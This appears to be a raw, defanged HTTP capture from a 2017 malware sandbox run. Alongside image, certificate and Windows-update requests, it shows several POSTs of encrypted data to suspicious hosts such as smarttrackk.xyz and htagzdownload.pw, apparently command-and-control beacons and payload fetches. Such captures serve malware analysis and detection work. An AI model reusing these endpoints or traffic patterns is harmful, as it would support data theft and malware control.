ndows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e406bbd8-b
32b-ad43-b177-c791ebe91eb7" stRef:documentID="adobe:docid:photoshop:84
bfd548-5114-11e7-a192-86375482fcfa"/> </rdf:Description> <
/rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>3..!....IDATx
..].xTU..L.$.$...tR.......C.".V..*......Y@e-..........,uA..@h"`B.. ...
.H!u......q. .. ....y..r.....'.U&..R.g?.........6k.>y...^.g.e@....?
.....W.4@.........L.......x......evrrj.......KII.QXX..... ......W.2...
......i...G.?...@*.....l..x................{..-....x>.hv..j...L..H.
...5........... ..nZ.~..............Z.X.K!5N@NNN(..=q.../.....;v..Sn..
7...P...To.~.i.U.W.S.g...v.......v.2...N.....7N..uk....w0cQ5mh..o..W..
.1f...{.8.."V....s,W..$..5...}\.5....2y.....:.svv..../@..L........<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-1.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d5ceb5ab74d0727715778c9259e9d5f3d1499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"596646b3-1cb5"

Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT

CF-Cache-Status: EXPIRED

Expires: Fri, 13 Jul 2018 05:08:00 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 37d9b8cf827883f4-KBP

Cache: HIT

X-Cached-Since: 2017-07-13T05:08:00 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-13T13:12:04 00:00

X-ID: m9-up-e245
1cb5...PNG........IHDR.......@......s......tEXtSoftware.Adobe ImageRea
dyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com
/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="
hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe
 Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:24449FC45291
11E7BDC0E513E060F7A3" xmpMM:DocumentID="xmp.did:24449FC5529111E7BDC0E5
13E060F7A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24449F
C2529111E7BDC0E513E060F7A3" stRef:documentID="xmp.did:24449FC3529111E7
BDC0E513E060F7A3"/> </rdf:Description> </rdf:RDF> </
x:xmpmeta> <?xpacket end="r"?>.L.....#IDATx......U..o..D2....
D..2(.p...,.vEQ....k`].Y1..1...E.(................40.0.....}.RU]]=....
...C..{.s.w.{.:...U.l...w.......Y[....V..h .V...........f`.h.....l}.E.
....m%.Zk;P. m.i.A...=[..mK....A[>..^......}....=.1....V.._@.L[/mgh
.h|.^mW....\.9K...m...8m............q.k..Xm/b&....%mf.2..?.).v..7...jk
P...^...?..v...>..MD..q.I......g&i.I...6.....j..8K....!.BOm.j...hk.
IA.G..".Vj[G....?.{.Wm.i[^.._'."T.......R,.[...Zj..t..j(<........(m
...</i.F.......<.......7Y|s...\.....*#......U.......M.....U.....
.T..#5..w....m.U^S...O.........%eJa0G.J....r.E.......h. ..%...m.V.<<< skipped >>>

GET /roots/dstrootcax3.p7c HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: apps.identrust.com


HTTP/1.1 200 OK

Date: Wed, 27 Sep 2017 23:18:14 GMT

Server: Apache

X-Frame-Options: SAMEORIGIN

X-XSS-Protection: 1; mode=block

Last-Modified: Fri, 19 Oct 2012 20:08:11 GMT

Accept-Ranges: bytes

Content-Length: 893

Cache-control: max-age=86400

Content-Type: application/x-pkcs7-mime
0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D.....'..0
9...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U..
..DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital S
ignature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..
..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.
2....w..{........s.z..2..~..0....*8.y.1.P..e..Qc....a.Ka..Rk...K.(.H..
....>.... .[.*....p....%.tr.{j.4.0...h.{T.....Z...=d......Ap..r.&.8
U9C....\@..........%.......:..n.>..\..<..i....*.)W..=....]......
B0@0...U.......0....0...U...........0...U..........{,q...K.u...`...0..
.*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~
.....K. D.....}..j.....N...:.pI............:^H...X._..Z.......Y..n....
...f3.Y[....sG. ...7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G
..P.......dc`........}...=2.e..|.Wv...(9..e...w.j..w........).....55.1
.HTTP/1.1 200 OK..Date: Wed, 27 Sep 2017 23:18:14 GMT..Server: Apache.
.X-Frame-Options: SAMEORIGIN..X-XSS-Protection: 1; mode=block..Last-Mo
dified: Fri, 19 Oct 2012 20:08:11 GMT..Accept-Ranges: bytes..Content-L
ength: 893..Cache-control: max-age=86400..Content-Type: application/x-
pkcs7-mime..0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.....
..D.....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust 
Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U.
...Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H....
.........0............P..W..be......,k0.[...}.@......3vI*.?!I..N..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.usertrust.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:58 GMT

Server: Apache

Last-Modified: Mon, 25 Sep 2017 21:19:01 GMT

Expires: Mon, 02 Oct 2017 21:19:01 GMT

ETag: 5A9FD501F956779F1497BE2BD6DE25CED4D61D4F

Cache-Control: max-age=410162,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: rmdccaocsp20

Content-Length: 471

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........z4.&...&T....$.T...2017092
5211901Z0s0q0I0... ........|.fT...D.b&...e{.z.......z4.&...&T....$.T..
.'f.V.I....p...."....20170925211901Z....20171002211901Z0...*.H........
...............e. ..yR..@o:.......h/D$a.....K.8.w.._.0{.[$.$......eI..
B.{....aV\......^..a.b|.M......NK..o...j.a.W....9...x.\.Y.`.^...A...{.
.>....j....v...".....C=..U8.......H.`....n.%R.`h...O..(</...>
.K\`..1...._..s.]e.......'..f...`..U.........2.\........!.f...

POST /temptrack/Store HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: smarttrackk.xyz

Content-Length: 224

Expect: 100-continue

Accept-Encoding: gzip

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

order="vh0WvrSx7tyP3j3ziobv3GXGzT4FpHv26R7/Npi4on94ORsW2Aryk0kdr/2Q6JK
hifYwEIQGonpYvY/8NzC/mbmExZ70TXG5yzf4ndoy0 tgMwGtdpdNJHOUXtlljbEfFYdDD
pc2LRASl1PFK0/abPj8SzeyNOH VuvYrWZdDptqIcjaDla8EMot1jb zdjjxgwPu2Uieyw
Iqufk/ANIqA=="

HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: close

Cache-Control: no-cache

X-RateLimit-Limit: 60

X-RateLimit-Remaining: 59

Date: Thu, 28 Sep 2017 03:12:10 GMT

Content-Encoding: gzip

14........................0..

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Cache-Control: max-age = 86408

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT

If-None-Match: "8017f9a85f10d21:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK

Cache-Control: max-age=604800

Content-Type: application/vnd.ms-cab-compressed

Last-Modified: Fri, 22 Sep 2017 22:03:52 GMT

Accept-Ranges: bytes

ETag: "014e8acee33d31:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Content-Length: 53978

Date: Thu, 28 Sep 2017 03:12:22 GMT

Connection: keep-alive

X-CCC: SE

X-CID: 2
MSCF............,...................I.................6K.u .authroot.s
tl.~.F..6..CK...8........i.g.B.A....%.k..5d.NI..RR".nTB.i/.].DQJ.,..".
X.g....N.......u...<.....{ .."'=..x..16...q.;.&'.4....a...e....#M..
.3..c`L.*3..|1.&_L ..._.i.h....J7.k..x.p..jEE....8d#......`....Mo.9AE.
...r<B.v'R....p"....e...f..g.t.<. Bs.x.8a.9;P..AD.._...9..h...g.
..<..!wj..........E1Nx ..^..S...-.l_.!..U.81X$..o.2..iz.a.Ez..S....
^._.<3}.S...l......x.....B..?....P0$....?y....w.`.f.:g0v..ZP..y.U.`
>... ..Z.cy..LU2..N..(......i........ ..`..y..c.Y.fzF0CG.@..Fe2.j.0
......{...]..4;dX..........a...T.0..]....Utv..!..p.M...'T_ b.;.#.\-..]
.T*......d.....`..#_2..........xKB.E.B...y...d.s..lP.;..?#._..#./.L|..
h!......R.....e_o."V..v.......Js.../E..1......3..3..G.8...........lZ.?
.B.)dW...7....?..MhZm.k......iO.....5.....{l.....t}...g..h.C.....v...{
..F.C)vO.3y...wX.M....V.....T......#..q..B.........V...r..H.B .x.tX`l.
<.P...JY...h).e...Z...Z...ku.B.....^.=.`D..|.-...U/l;r.......{-h..g
._B.Y.a.[l..l..'.h.[2.4.\u.....(R8..,.....i....x....w..z..%.=.@#a....!
./....>...g...-.,>..6!.K..e..z..kh.0.n4....9.l2u.C..'.]Nh..c<
.......KM...k.....e......./...F4hn:....u.\.C.M....OI.ZmT..co......C.).
....c...v.r.u....5./...\.....l....7=.`..{....`..>.bUQ..I.........n.
.f.hf..*......M.:[S.W....e_.........c'..A'.$..9.,p..0...... .b0.....k1
.Z.........u4d.....]..p.f......Vk.'z:....f9}8.6...].D6P.....z.).C.-BF.
.F...P.......$..d....c0Z0.......3..K........... .. k....._.:..x.F.C...
.7.P.l..1.%.lCJ.N.."...w... .%?;xT.&_Ew.s.......e.k&..^#.. ..U?.9.<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-3.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=dac7143069d49c3cfb69be27932ba61891502689050; expires=Tue, 14-Aug-18 05:37:30 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"598d8e77-8d5"

Last-Modified: Fri, 11 Aug 2017 11:01:11 GMT

CF-Cache-Status: REVALIDATED

Expires: Tue, 14 Aug 2018 05:37:30 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 38e19005b0318ad4-KBP

Cache: HIT

X-Cached-Since: 2017-08-14T05:37:30 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-08-14T15:35:11 00:00

X-ID: m9-up-e239
8d5...PNG........IHDR.......L.......l`....tEXtSoftware.Adobe ImageRead
yq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M
0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:x
mptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "&
gt; <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#
"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/
xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="h
ttp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe 
Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:06F7D5D3529F1
1E7BDC0E513E060F7A3" xmpMM:DocumentID="xmp.did:06F7D5D4529F11E7BDC0E51
3E060F7A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:06F7D5D
1529F11E7BDC0E513E060F7A3" stRef:documentID="xmp.did:06F7D5D2529F11E7B
DC0E513E060F7A3"/> </rdf:Description> </rdf:RDF> </x
:xmpmeta> <?xpacket end="r"?>.Q./...CIDATx..ZK..U.}U]..L.3c.Q
.....:".#"....O\.....D.#...B4..... ......BEQ.Bkb.2._.%&3N.L..]..].....
.W.R..p..T.y.....I...R...y...0l.....('i..5.}.. 2.d..zI=X..............
.'.D..K.?...y]8.h{...p>.z$n... .....&`...!.Z.<.V...x...CPu.e.tJ.
...........9.8...__!..;.!...i....%.R.&..U.............3.<`.. ".....
..#...d......je...V....s.|.B.?t...F.!.......{<|.....R..2..*......&l
t;....@>..n.K./...7.s..f,...v....%oe.]..&.4...[.| ..=.....h......mm
...b...S.o.>b.~..9p?.1H;5..V.....;.......q.A>...C.G....i.z.;..v.
...0O......2e...F.6......p.=._%t... y.).V.S....9..|...h.x...|....?<<< skipped >>>

GET /pokermatch/podarok200/images/app-google-play.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=dcbb34ddc65f732ff1e849188c55ecfe71502689050; expires=Tue, 14-Aug-18 05:37:30 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"598d8e77-1fcf"

Last-Modified: Fri, 11 Aug 2017 11:01:11 GMT

CF-Cache-Status: REVALIDATED

Expires: Tue, 14 Aug 2018 05:37:30 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 38e19007e6018219-KBP

Cache: HIT

X-Cached-Since: 2017-08-14T05:37:30 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-08-14T15:35:30 00:00

X-ID: m9-up-e239
1fcf...PNG........IHDR.......,.............tEXtSoftware.Adobe ImageRea
dyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.c
om/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Resourc
eRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocument
ID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.di
d:47D8320252A511E7BDC0E513E060F7A3" xmpMM:InstanceID="xmp.iid:47D83201
52A511E7BDC0E513E060F7A3" xmp:CreatorTool="Adobe Photoshop CC 2015 (Wi
ndows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e406bbd8-b
32b-ad43-b177-c791ebe91eb7" stRef:documentID="adobe:docid:photoshop:84
bfd548-5114-11e7-a192-86375482fcfa"/> </rdf:Description> <
/rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx
....X..../..A.."C....p......e..Z.d./..4..L g.in[...8.(..ANp  ..e.?/...
vCs...y....;.9.9...=_...Jii...P`#.,`.... .........]y.5`......Q.......,
._./ig...X..S.M.O.....@4..X............C......6..X,...m..`).D=3l;.X...
..Z....\...P.X..z.kx..!!.boo.>11q~...k..9..o..._...JIII..q.....>
.u./..2.........-,,.v............]Z.l....k.....edd...%!X.........g)))1
....{e.;u...6k........[.l.!...\E.)@o.....s.......EEE.......1!!akAA....
..<.F....O.j..A....xp9N..@.....^.v..7n..=.w.6...3..W^y%........<<< skipped >>>

GET /pokermatch/podarok200/images/chip-2.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive



m stRef:instanceID="xmp.iid:e406bbd8-b32b-ad43-b177-c791ebe91eb7" stRe
f:documentID="adobe:docid:photoshop:84bfd548-5114-11e7-a192-86375482fc
fa"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>z,f.....IDATx......Wy...Zz.f.4.M.f..%...ap...
.@.....s/.......7.H......@..cC.c.M0.x.eK..}.i4.L.L.....9.tuO.,.......i
UwWW.:...og.i....>......o.}.........!.U.gS.....>A.Y.Gi?L........
n.z.>Q.....s.N...i.................a.Pu.........*..C..h...o.K.o.~..
{.............#......'h.;...o...:p~...%._.....6.m0..v.....2..Wf.......
...........o.?.:p.{{/./...W..n...'..zW......".......o..._O.p...%..c...
.W9h.v.M....i.8?.m.,..._............)h.....L[3.?...P...yE7....M.~.....
.=\..u..R[..../.}.........Wj.G./....w.~s.....r7..y...=..........n}...W
.....}.._{.;@.m..(.n~....E.e.V.P......K..... ...5....4.K...8<..(...
_..i./.K.........0.(...0..s>....p}........s>.......R.k.CP...l.[.
..m{}...y..o.W."...}.........?...".......(oJ}..m.....Zi<..."......b
......t}<*.....K._$.......e...,}O,....O.:p..x.....w?H.....N../.....
G.8.m.,.}=M../..\..\.....G.8.m[..7.`K...v..u............_{.R....S.<
[..V..A.rXE .....Y....}.%|/..c..O.:p..x..A{..s..O[[.&...e..C/.{.".M.&g
t;=....-. J.....6..y....h.K.U....x}....Jm#....2,g.W:..';.......;..^...
wy...8..g.X*..{.L.....0..<<7..E...e.v.>S...y.....i.1~..$.....
d...9...q.w."..o.X.M.8....5...........j.xT......[..:p^....*....M.u.@.V
7G/.v..]&.}..j.@8....^hhk..K..\CC...F....y_.........o.....nU..W..../..
1--]q......}.D<.{.p...6u/....M....V....f..].....|F..k.F.3......<<< skipped >>>

POST /Series/Conumer4Publisher.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: htagzdownload.pw

Content-Length: 97

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

jiglibaf=2/PacbsI5vqBEINXG8q3htXyHlRmEttLK05YRLF2uhVSi3lmDCYCkcXLkL8i9
7mYts048SLWjZdoQjw45euh g==

HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Thu, 28 Sep 2017 03:12:10 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

1e5.....TPFaFCsEzvY aW2efHd n8w DY613ok9Jyg7CnMDsQykG jlKP5EVXLGWkbGyi
Ehb6S01GNDfTckpJd ZdkkzOU3/mL/CispOHOwzKJru9dUFXYJAd6O2EEsX5KQc1nGS6RW
iGg0gk8oCqD5Yz2i7LHAh17LKSD8KK fwizS7aCLneSc1LOOkB62UWYu5Ah7BQeF17kH4j
vPJ6beWS57ApuUITIaJ7pFi0G9psjIqRiMYPoBFXQPzUmo59TNRFvnc21xwZNkp4CmA9Tu
EBHiu0U6NwdZtYgVLEuol22SRx/2/5R8dx1jBRjcf83Ojx2FiveeHEfnuWUndjk4nMiU5V
HK8EuFO00SqsqbKc7BmYbRa2szN2nJeZAEHp8xFHauXs9U4ygBFJ0Cgn8Z1gQCdM YJZRm
MdPksJ/UIvDzMC919gxZko4MUCVwlNWvGK/XTw5ScQluuKXab46FXnW7Ig==......0..H
TTP/1.1 200 OK..Server: nginx/1.10.3 (Ubuntu)..Date: Thu, 28 Sep 2017 
03:12:10 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encodin
g: chunked..Connection: keep-alive..1e5.....TPFaFCsEzvY aW2efHd n8w DY
613ok9Jyg7CnMDsQykG jlKP5EVXLGWkbGyiEhb6S01GNDfTckpJd ZdkkzOU3/mL/Cisp
OHOwzKJru9dUFXYJAd6O2EEsX5KQc1nGS6RWiGg0gk8oCqD5Yz2i7LHAh17LKSD8KK fwi
zS7aCLneSc1LOOkB62UWYu5Ah7BQeF17kH4jvPJ6beWS57ApuUITIaJ7pFi0G9psjIqRiM
YPoBFXQPzUmo59TNRFvnc21xwZNkp4CmA9TuEBHiu0U6NwdZtYgVLEuol22SRx/2/5R8dx
1jBRjcf83Ojx2FiveeHEfnuWUndjk4nMiU5VHK8EuFO00SqsqbKc7BmYbRa2szN2nJeZAE
Hp8xFHauXs9U4ygBFJ0Cgn8Z1gQCdM YJZRmMdPksJ/UIvDzMC919gxZko4MUCVwlNWvGK
/XTw5ScQluuKXab46FXnW7Ig==......0......

GET /Series/Movie/Ragnar/2/UA.json HTTP/1.1

Host: htagzdownload.pw


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Thu, 28 Sep 2017 03:12:10 GMT

Content-Type: application/json

Content-Length: 3756

Last-Modified: Thu, 28 Sep 2017 03:00:02 GMT

Connection: keep-alive

ETag: "59cc65b2-eac"

Accept-Ranges: bytes

zS5RDJPMRa0g0Yy9a/Q4VhrwtkEazi5pkwGuseRyM3v56WYBFR2oHpKie0MyVzk5X494m7
8N7Itz45Iyfa2pZt9x/S4qpiDty Fi6mTgwplUJdnp/Mv8AVWgXNtAGe7OqjK87BJkoS4H
HdDZR1 Y9tLkqQ1sAlM0MovLBW53IHFWafHIYZnW97yzKirpvPYJVHdxzwG3e/B HytJ6L
jTtpSiVFthhzm0jxyJ5D0SxjGRINSP2yuAjUvIZC3hvyicI94YXFwwuVLuvkNc 4Hs0OHh
/L/HUup3BhjS5pEd3gKrazzMgLlU/7UTDyiGbPvIcssAsqKZuM/GCZIWbcyJMR20k40LeP
hVylLfXKbIZnd4UcyAnrOQ9SUNLaQ46Unyh03O2a1stVBXmNi4Zsd3lJHDav0r4zrgymUZ
Ws9OZCuitJa84yyT8f40i6/6TZzoiaSsp/kGszHouDsW3w6P7gjh1p4tFY4SCdBKmu39GL
jedtUyc6U eVGX0tihdFBsO IYDtDaybj58iCujcd2cgGrlIdv9MN/HztitDpA5U092EcK
TRJH0fphMGSvSjAzIqNSjYIO3rbBLSn10XDMb8wa/s9TN97cuUR88Ri8BFb8rvbeiMG3XV
DPK0y70a dyJBaAziG9EErJW7caeoz8ekpXpeqJZtwZjNNn/kCjYNy05UIsY0WpEYHzYyr
HcXXyS2ofFtw OIc5kdVNHAUhNgIy5SMfjCdDcEa8lNLP9VgeQo02hlHRW61fJgctbg8FO
CKERoErpC2i6TIxFuNd Y0dPweFP 5I/imp8LlJSQYOeYhu3d3epSsn9FntM18NKC4v7uU
pbg6pRRy3zIa2DZwc8fZ7 Aj  uutT0AAy2hmSI4a9pUYjA8LotDW5vOw4VE PDrTyamrX
mzclFkiG 9kakTZUPlmKRYvVU5fFghev4lsHWC1qVqt1fQOoiPPnn2PwSiUO9tEn94PzBl
VeyTJDUkgfBv/bCuuPcW/9rlKaVpp zEyspe/Bo6oEHpQgHnojFFfKTjhlRURm2k2xCmFA
fXrhEUqAIlR0kh11JuONYoEthEnlsPgpPxjkUb1mqnJkEVchbxU/c1 cSS R40cW56aQoe
bipflcO45lQdTa7iYQ2OzF4s/ucYzU8sIktZX3jDC2OXLBaxVgqVW9NIAS/uqV1rm4dnPi
F92huZeZ95V96N77QOGnAEWgqflkIlrff2sXoNqHeSGhPDWR9Z3kKVHjNSgczIqX7igiuH
QPbIbilWbW 7KBXEdKLljT5DhSrBJ qT7pK2XcYZC7boy1bUx0dXcrNThyjowxLVD6ILPd
YSFFO EU632RlYaqvWTe0eop1u/mM8sP0wSa56xlPfr3voNLzNSoANLf7qFmL9Ezj5O4Kv
zKVGs1ixWv03VW F s5nVCc2wvWDCwxzWqfA7bRwleP4SviR1RIBmdMlcRFUbG9jJt7nTy
cks41TksB4mYq YlmBOqnBuTXHvmkjd/jJCsUwNQeGuoet8HLoTTbxIkwF1aINP7VW

<<< skipped >>>

POST /Series/Conumer1Pirlo.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: htagzdownload.pw

Content-Length: 51

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

Lyouvi=RCO0bze5gj137V GKKrirZDEhbKuQIjqi1P/djTx5n4=

HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Thu, 28 Sep 2017 03:12:05 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

683.....O4lnG3yQ9ZglqSdq92XDEK45514hRgK1mDaJzh /YNAqdVo1ys7bxazBBHmvqm
7yiJm491FeUBbpYiGf7XKms85xq/tqN11oDz70o7jAtrraFMkfS5jAZGxMBn39RfTbwo5o
njL0h5n3lPeevQrJn/dl phmM6Yble9HKzk7Raku4134022M9JSrBscqoyOFUyAmW CJF1
Fj7L494R8aRo5CxIUn3qGaZygn1LaxN115uMkxMVvUWTRb/MBkpdw9A59jUk7MGtIUP8uw
 OTJu2yE4BUmnIfOltXz1/0pFo0kbE0HSV/Pq3gtNdC2DVwTTYFOSwpNuz 43dze5tN4On
RLHwiyn 8MpeP4tCqgVs0oo sX eZQUUDtREUao50I6CXPgvEUEYOsUQ5sOzVjWkEIb3Ft
oYgY7sDczsC1JInYdwWlru3any8Btf1 /w6k3rLL7DXtQrrorCy9ArgXaQrsMEpbhk2rZE
TpWmns2vK5JIY yRz18Fc/LqOhf1IanVuJt05MCDJleen/1xfbkt0UZq su5YORyRwiy8u
 YpHuP0ftAQngljvriYCoSI1S8Mb/rJ/Qb2VUeuQydM4TlzaNuX PSUuIPpoyd5jAUDr 2
O1e O/r IhZZfJx5vOSnPCZfl/IJOLC0VQyoWeq 4epSePPsO2TOHtRFePjCj1dM2aD6Jk
NsovzGFfFd5piOixEtdzGtStVGb3OBQwQhH/QaMlLMaiP9AxlkNbyLbuyS48aXX5 fpFc3
lMUBvfhcV69Ui/xjMWRKJFez0f6eOv7eMrAFwPqLXS6d/RU1mAz hiQc/kU1f9LdJOfkZT
AJKuxagwCbrWJu4HymOVETbLPT3Hr BjfrwZRvco93HEvog0 F7fJ0mYnq7tO0I8vLNnZn
7vtCV0RGFW3oRMVkdoR7cP0F/npMUuszA2YRGvGm3HSEPPl8OnPB426SLmtbby/tERR//m
JK4v7d3qaass5nW1E6YmsXp yy/tHmJyTU7EIcSrKeDADg TnI7XXggm nUeeM2RN/yKHo
8z5xg3SvLGe4vsNpXCKj10AoVJ7kwU/a2bSCO2mZxTBWh6dpJITCTWUvXI JdfI SZ4auA
P DgovFfW57uaYdVuA0ERKSyZtg1xP0hN/alv/AYU7FdwfiFXFARfMoylKrragiLzejk8m
1NImxKEnZ11Gojo6AlvhuZX4xgWB0Wh F4xCyaXf2mvaE8aNv40P1gDLgdH82diZ/fJAD8
5L6haM281MBOeMcOR4e949wakeoRGS5oIs2M4ZqfNm7WgfuIYAlrzv BgDdpLzBsDq4gjH
GFxIveqrMuADryUtzHaHJGu/Psd kHbIdKERq8 IlBzSkdrAryNore HcOzhQ/pxrWPLGJ
LfRDNmmw WZGx6PpeozP/8poH4jW9z prHoRx8Rkh4xFLvrVn6uSUAso/6QBkyB3ArUi5s
T1yuTeBzJHBcVC06hBmrQpbENF3CD2hfgS3kp/KU4dFTxCFw7GwMQYq/SBZqET0nuI

<<< skipped >>>

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:29 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=120200, public, no-transform, must-revalidate

Last-Modified: Thu, 28 Sep 2017 02:21:16 GMT

Expires: Fri, 29 Sep 2017 14:21:16 GMT

ETag: "c9d119809ad2c096216a3327e7898a1ae4fbbe38"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1730

Connection: close

